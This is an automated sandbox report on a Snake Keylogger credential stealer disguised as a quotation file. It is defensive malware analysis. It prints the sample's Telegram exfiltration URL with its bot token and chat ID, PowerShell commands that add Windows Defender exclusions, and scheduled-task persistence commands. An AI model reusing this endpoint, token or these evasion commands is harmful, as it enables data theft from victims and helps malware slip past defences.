Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION 03664710859027.exe

Overview

General Information

Sample name:QUOTATION 03664710859027.exe
Analysis ID:1640567
MD5:b5b72eb3433cfd41391fb13eace1921a
SHA1:d9f26958c354afdf446054380d6b6178e6d9a913
SHA256:e447c6661b45bf1feacf2e5610b20487dadf0b09150b3371f86d09f01a29a2b0
Tags:exeuser-adrian__luca
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • QUOTATION 03664710859027.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\QUOTATION 03664710859027.exe" MD5: B5B72EB3433CFD41391FB13EACE1921A)
    • powershell.exe (PID: 7728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION 03664710859027.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8120 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7808 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpE82C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 7980 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
  • IEGkgGtnYpDN.exe (PID: 8112 cmdline: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exe MD5: B5B72EB3433CFD41391FB13EACE1921A)
    • schtasks.exe (PID: 7292 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpFB27.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 7380 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
  • svchost.exe (PID: 1420 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7510901185:AAEaNMHbnFNUALyMNDM6DBXd5YExpBwIHTQ/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7510901185:AAEaNMHbnFNUALyMNDM6DBXd5YExpBwIHTQ/sendMessage?chat_id=1695799026", "Token": "7510901185:AAEaNMHbnFNUALyMNDM6DBXd5YExpBwIHTQ", "Chat_id": "1695799026", "Version": "5.1"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.3545341483.0000000000417000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000008.00000002.3545341483.0000000000417000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
    • 0x46ea:$x1: $%SMTPDV$
    • 0x30bc:$x2: $#TheHashHere%&
    • 0x4692:$x3: %FTPDV$
    • 0x305c:$x4: $%TelegramDv$
    • 0x99e:$x5: KeyLoggerEventArgs
    • 0xd33:$x5: KeyLoggerEventArgs
    • 0x46b6:$m2: Clipboard Logs ID
    • 0x48f4:$m2: Screenshot Logs ID
    • 0x4a04:$m2: keystroke Logs ID
    • 0x4cde:$m3: SnakePW
    • 0x48cc:$m4: \SnakeKeylogger\
    0000000D.00000002.3549205458.0000000006CFA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      0000000D.00000002.3549205458.0000000006C62000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000008.00000002.3549250427.0000000007374000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 24 entries
          SourceRuleDescriptionAuthorStrings
          13.2.vbc.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.QUOTATION 03664710859027.exe.4116db8.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.QUOTATION 03664710859027.exe.4116db8.1.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                0.2.QUOTATION 03664710859027.exe.4116db8.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x12b57:$a1: get_encryptedPassword
                • 0x12e3b:$a2: get_encryptedUsername
                • 0x12963:$a3: get_timePasswordChanged
                • 0x12a5e:$a4: get_passwordField
                • 0x12b6d:$a5: set_encryptedPassword
                • 0x141d0:$a7: get_logins
                • 0x14133:$a10: KeyLoggerEventArgs
                • 0x13d9e:$a11: KeyLoggerEventArgsEventHandler
                0.2.QUOTATION 03664710859027.exe.4116db8.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x1a4d8:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x1970a:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x19b3d:$a4: \Orbitum\User Data\Default\Login Data
                • 0x1ab7c:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 7 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION 03664710859027.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION 03664710859027.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION 03664710859027.exe", ParentImage: C:\Users\user\Desktop\QUOTATION 03664710859027.exe, ParentProcessId: 7584, ParentProcessName: QUOTATION 03664710859027.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION 03664710859027.exe", ProcessId: 7728, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION 03664710859027.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION 03664710859027.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION 03664710859027.exe", ParentImage: C:\Users\user\Desktop\QUOTATION 03664710859027.exe, ParentProcessId: 7584, ParentProcessName: QUOTATION 03664710859027.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION 03664710859027.exe", ProcessId: 7728, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpFB27.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpFB27.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exe, ParentImage: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exe, ParentProcessId: 8112, ParentProcessName: IEGkgGtnYpDN.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpFB27.tmp", ProcessId: 7292, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpE82C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpE82C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION 03664710859027.exe", ParentImage: C:\Users\user\Desktop\QUOTATION 03664710859027.exe, ParentProcessId: 7584, ParentProcessName: QUOTATION 03664710859027.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpE82C.tmp", ProcessId: 7808, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION 03664710859027.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION 03664710859027.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION 03664710859027.exe", ParentImage: C:\Users\user\Desktop\QUOTATION 03664710859027.exe, ParentProcessId: 7584, ParentProcessName: QUOTATION 03664710859027.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION 03664710859027.exe", ProcessId: 7728, ProcessName: powershell.exe
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1420, ProcessName: svchost.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpE82C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpE82C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION 03664710859027.exe", ParentImage: C:\Users\user\Desktop\QUOTATION 03664710859027.exe, ParentProcessId: 7584, ParentProcessName: QUOTATION 03664710859027.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpE82C.tmp", ProcessId: 7808, ProcessName: schtasks.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-17T13:04:26.140879+010028033053Unknown Traffic192.168.2.1149708104.21.80.1443TCP
                2025-03-17T13:04:30.004101+010028033053Unknown Traffic192.168.2.1149717104.21.80.1443TCP
                2025-03-17T13:04:32.541556+010028033053Unknown Traffic192.168.2.1149727104.21.80.1443TCP
                2025-03-17T13:04:38.068175+010028033053Unknown Traffic192.168.2.1149739104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-17T13:04:24.181025+010028032742Potentially Bad Traffic192.168.2.1149706193.122.6.16880TCP
                2025-03-17T13:04:25.681029+010028032742Potentially Bad Traffic192.168.2.1149706193.122.6.16880TCP
                2025-03-17T13:04:26.884142+010028032742Potentially Bad Traffic192.168.2.1149709193.122.6.16880TCP
                2025-03-17T13:04:28.587273+010028032742Potentially Bad Traffic192.168.2.1149712193.122.6.16880TCP
                2025-03-17T13:04:29.478054+010028032742Potentially Bad Traffic192.168.2.1149712193.122.6.16880TCP
                2025-03-17T13:04:30.712324+010028032742Potentially Bad Traffic192.168.2.1149719193.122.6.16880TCP
                2025-03-17T13:04:31.977903+010028032742Potentially Bad Traffic192.168.2.1149723193.122.6.16880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-17T13:04:40.274286+010028530061A Network Trojan was detected192.168.2.1154598149.154.167.220443TCP
                2025-03-17T13:04:45.512201+010028530061A Network Trojan was detected192.168.2.1161943149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-17T13:04:39.824632+010018100081Potentially Bad Traffic192.168.2.1154598149.154.167.220443TCP
                2025-03-17T13:04:45.256540+010018100081Potentially Bad Traffic192.168.2.1161943149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000008.00000002.3549250427.00000000071A1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7510901185:AAEaNMHbnFNUALyMNDM6DBXd5YExpBwIHTQ/sendMessage?chat_id=1695799026", "Token": "7510901185:AAEaNMHbnFNUALyMNDM6DBXd5YExpBwIHTQ", "Chat_id": "1695799026", "Version": "5.1"}
                Source: vbc.exe.7380.13.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7510901185:AAEaNMHbnFNUALyMNDM6DBXd5YExpBwIHTQ/sendMessage"}
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeReversingLabs: Detection: 30%
                Source: QUOTATION 03664710859027.exeReversingLabs: Detection: 30%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpackString decryptor:
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpackString decryptor: 7510901185:AAEaNMHbnFNUALyMNDM6DBXd5YExpBwIHTQ
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpackString decryptor: 1695799026
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpackString decryptor:
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpackString decryptor: 7510901185:AAEaNMHbnFNUALyMNDM6DBXd5YExpBwIHTQ
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpackString decryptor: 1695799026
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpackString decryptor:
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpackString decryptor: 7510901185:AAEaNMHbnFNUALyMNDM6DBXd5YExpBwIHTQ
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpackString decryptor: 1695799026

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: QUOTATION 03664710859027.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:49707 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:49714 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:54598 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:61943 version: TLS 1.2
                Source: QUOTATION 03664710859027.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: woeJ.pdbSHA256 source: QUOTATION 03664710859027.exe, IEGkgGtnYpDN.exe.0.dr
                Source: Binary string: woeJ.pdb source: QUOTATION 03664710859027.exe, IEGkgGtnYpDN.exe.0.dr
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 4x nop then jmp 0773A448h0_2_07739DBC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0570F1F6h8_2_0570F007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0570FB80h8_2_0570F007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_0570E528
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_0570ED3C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_0570EB5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC185F5h8_2_0AC182B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC17401h8_2_0AC17158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC15571h8_2_0AC152C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC17CB1h8_2_0AC17A08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC15E21h8_2_0AC15B78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC10B99h8_2_0AC108F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC16B29h8_2_0AC16880
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC102E9h8_2_0AC10040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC150F1h8_2_0AC14E48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC18109h8_2_0AC17E60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC16279h8_2_0AC15FD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC159C9h8_2_0AC15720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC10741h8_2_0AC10498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC166D1h8_2_0AC16428
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC17859h8_2_0AC175B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC10FF1h8_2_0AC10D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0AC16FAAh8_2_0AC16D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 04ECF1F6h13_2_04ECF007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 04ECFB80h13_2_04ECF007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_04ECE528
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_04ECED3C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_04ECEB5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947BBE9h13_2_0947B940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09471A38h13_2_09471966
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09471011h13_2_09470D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947F009h13_2_0947ED60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09470BB1h13_2_09470900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947EBB1h13_2_0947E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09471471h13_2_094711C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947C499h13_2_0947C1F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947C041h13_2_0947BD98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947F461h13_2_0947F1B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 094702F1h13_2_09470040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947E301h13_2_0947E058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947DEA9h13_2_0947DC00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947B791h13_2_0947B4E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09470751h13_2_094704A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947E759h13_2_0947E4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947D5F9h13_2_0947D350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947DA51h13_2_0947D7A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947C8F1h13_2_0947C648
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947FD11h13_2_0947FA68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947F8B9h13_2_0947F610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09471A38h13_2_09471610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09471A38h13_2_09471620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947D1A1h13_2_0947CEF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0947CD49h13_2_0947CAA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D85F5h13_2_0A3D82B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D7401h13_2_0A3D7158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D7CB1h13_2_0A3D7A08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D8109h13_2_0A3D7E60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D50F1h13_2_0A3D4E48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D5571h13_2_0A3D52C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D59C9h13_2_0A3D5720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]13_2_0A3DFF0A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D5E21h13_2_0A3D5B78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D6279h13_2_0A3D5FD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D66D1h13_2_0A3D6428
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A3D02E9h13_2_0A3D0040
